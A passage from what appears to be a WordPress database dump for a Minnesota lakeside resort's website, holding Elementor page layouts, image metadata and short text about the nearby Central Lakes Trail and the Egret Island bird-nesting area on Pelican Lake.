mated_gradient_color\":\"#b800c9\",\"_id\":\"3e077e8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3ee05ec\"}]},\"elements\":[{\"id\":\"c101f05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Our Resort is right next to the <a href=\\\"http:\\/\\/centrallakestrail.com\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Central Lakes Trail <\\/a><\\/h3><p>You can ride 18 miles from the resort to Fergus Falls or 82 miles to St. Joseph by catching the Lake Wobegon Trail.<\\/p><h3>Bring Your Bike the trail is very scenic and level for all ages to enjoy.<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2011,771,'_elementor_version','2.5.12'),(2012,771,'_elementor_template_type','post'),(2013,771,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2015,473,'_elementor_edit_mode','builder'),(2016,473,'_elementor_template_type','post'),(2017,473,'_elementor_version','2.5.16'),(2024,773,'_wp_attached_file','2019/04/Screen-Shot-2019-04-09-at-8.12.40-PM.png'),(2025,773,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:299;s:6:\"height\";i:225;s:4:\"file\";s:48:\"2019/04/Screen-Shot-2019-04-09-at-8.12.40-PM.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.12.40-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.12.40-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.12.40-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2026,774,'_wp_attached_file','2019/04/Screen-Shot-2019-04-09-at-8.18.18-PM.png'),(2027,774,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:296;s:6:\"height\";i:218;s:4:\"file\";s:48:\"2019/04/Screen-Shot-2019-04-09-at-8.18.18-PM.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.18.18-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.18.18-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.18.18-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2028,775,'_wp_attached_file','2019/04/Screen-Shot-2019-04-09-at-8.19.24-PM.png'),(2029,775,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:299;s:6:\"height\";i:223;s:4:\"file\";s:48:\"2019/04/Screen-Shot-2019-04-09-at-8.19.24-PM.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.19.24-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.19.24-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.19.24-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2031,473,'_elementor_data','[{\"id\":\"4e75edc\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"75e0b17\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"190ff24\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e7f7f11\"}]},\"elements\":[{\"id\":\"d12d45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e166c4f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"825f625\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4ecd425\"}]},\"elements\":[{\"id\":\"bcb8ee8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>EGRET ISLAND SCIENTIFIC AND NATURAL AREA<\\/strong><br \\/>A 34 acre island on Pelican Lake with an egret\\/ heron, one of the largest in Minnesota to protect nesting Herons, Egrets and Cormorants.<br \\/><strong>BEST TIMES TO VISIT<\\/strong>: May through July<br \\/><strong>BIRDS TO LOOK FOR:<\\/strong> Great Blue Heron, Great Egret, Black crowned Night Heron, Bald Eagles and many varieties of waterfowl.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"652a9c0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"941a68a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"db1cd2c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"77f2fe7\"}]},\"elements\":[{\"id\":\"907b353\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dff2d5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"13e12df\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"79f88fc\"}]},\"elements\":[{\"id\":\"78339db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0111cropped.jpg\",\"id\":334},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"24a8461\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"277c649\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2776fcf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e46a15c\"}]},\"elements\":[{\"id\":\"35a87df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0528.jpg\",\"id\":337},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"416845e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f6c85c6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e9eb61f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2f7e666\"}]},\"elements\":[{\"id\":\"877051d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0428.jpg\",\"id\":485}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2afc1af\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"82265b8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61556d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"879b52c\"}]},\"elements\":[{\"id\":\"183922b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"159b541\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c0cb14\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"502233b\"}]},\"elements\":[{\"id\":\"e65066b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.12.40-PM.png\",\"id\":773}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6484ac8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5b682d2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6278ced\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f10a619\"}]},\"elements\":[{\"id\":\"3611c11\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3645.jpg\",\"id\":357},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3512ca9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"85d8902\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"29fbccb\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6cd8a18\"}]},\"elements\":[{\"id\":\"a981a86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3607.jpg\",\"id\":356},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a786f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a58d1af\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4ffc419\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"631f271\"}]},\"elements\":[{\"id\":\"61eb0cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c4c154c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9ad33c4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"92a65b9\"}]},\"elements\":[{\"id\":\"6e7ea21\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3381.jpg\",\"id\":352},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"210e62a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c9955f8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6af7ce6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"dd4630f\"}]},\"elements\":[{\"id\":\"ea948a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0971.jpg\",\"id\":338}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ddf3233\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bab1281\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ff057f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"260fb0c\"}]},\"elements\":[{\"id\":\"f85d395\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2428.jpg\",\"id\":185},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df56761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5f9df41\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d7d61cf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"616f81d\"}]},\"elements\":[{\"id\":\"d447070\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73a82be\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1d284f6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"95bad3f\"}]},\"elements\":[{\"id\":\"0b1fe5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2438.jpg\",\"id\":186},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8ff0a4c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9282b83\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9946c13\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2df9de4\"}]},\"elements\":[{\"id\":\"efd238a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0273.jpg\",\"id\":484}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5b28a00\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"aa717c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a627f24\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f55fc3f\"}]},\"elements\":[{\"id\":\"33c1da6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3449.jpg\",\"id\":487},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c310c4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dc27ce8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"52c6b37\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2bc1f34\"}]},\"elements\":[{\"id\":\"136d8d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f17526a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c1f4961\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1de3965\"}]},\"elements\":[{\"id\":\"953ca0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.18.18-PM.png\",\"id\":774}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8665d90\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0c9f6ba\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"657872e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"cccb494\"}]},\"elements\":[{\"id\":\"2c32f51\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3325.jpg\",\"id\":486},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9f8ffe1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"206e371\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aaed728\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"302f717\"}]},\"elements\":[{\"id\":\"bcb10d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.19.24-PM.png\",\"id\":775}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2032,776,'_wp_page_template','default'),(2033,776,'_elementor_edit_mode','builder'),(2034,776,'_elementor_template_type','post'),(2035,776,'_elementor_version','2.5.12'),(2036,776,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2037,776,'_elementor_data','[{\"id\":\"60c188ee\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a1f7775\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"7569ba7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9ece389\"}]},\"elements\":[{\"id\":\"6f1ef0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"814cd62\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e779ec0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"eb2bd31\"}]},\"elements\":[{\"id\":\"2945c080\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>EGRET ISLAND SCIENTIFIC AND NATURAL AREA<\\/strong>\\r\\nA 34 acre island on Pelican Lake with an egret\\/ heron, one of the largest in Minnesota to protect nesting Herons, Egrets and Cormorants.\\r\\n<strong>BEST TIMES TO VISIT<\\/strong>: May through July\\r\\n<strong>BIRDS TO LOOK FOR:<\\/strong> Great Blue Heron, Great Egret, Black crowned Night Heron, Bald Eagles and many varieties of waterfall.\\r\\n\\r\\n<img class=\\\"alignnone size-medium wp-image-334\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0111cropped-300x240.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"240\\\" \\/><img class=\\\"alignnone size-medium wp-image-337\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0528-300x215.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"215\\\" \\/><img class=\\\"alignnone size-medium wp-image-336\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0452-300x199.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"199\\\" \\/><img class=\\\"alignnone size-medium wp-image-351\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3300-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-357\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3645-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-356\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3607-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-352\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3381-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-338\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0971-300x205.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"205\\\" \\/><img class=\\\"alignnone size-medium wp-image-185\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2428-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-186\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2438-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-484\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0273-300x199.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"199\\\" \\/><img class=\\\"alignnone size-medium wp-image-487\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3449-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-499\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN4078-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-486\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3325-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/><img class=\\\"alignnone size-medium wp-image-496\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3819-300x225.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" \\/>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75edc\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"75e0b17\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"190ff24\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e7f7f11\"}]},\"elements\":[{\"id\":\"d12d45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e166c4f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"825f625\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4ecd425\"}]},\"elements\":[{\"id\":\"bcb8ee8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>EGR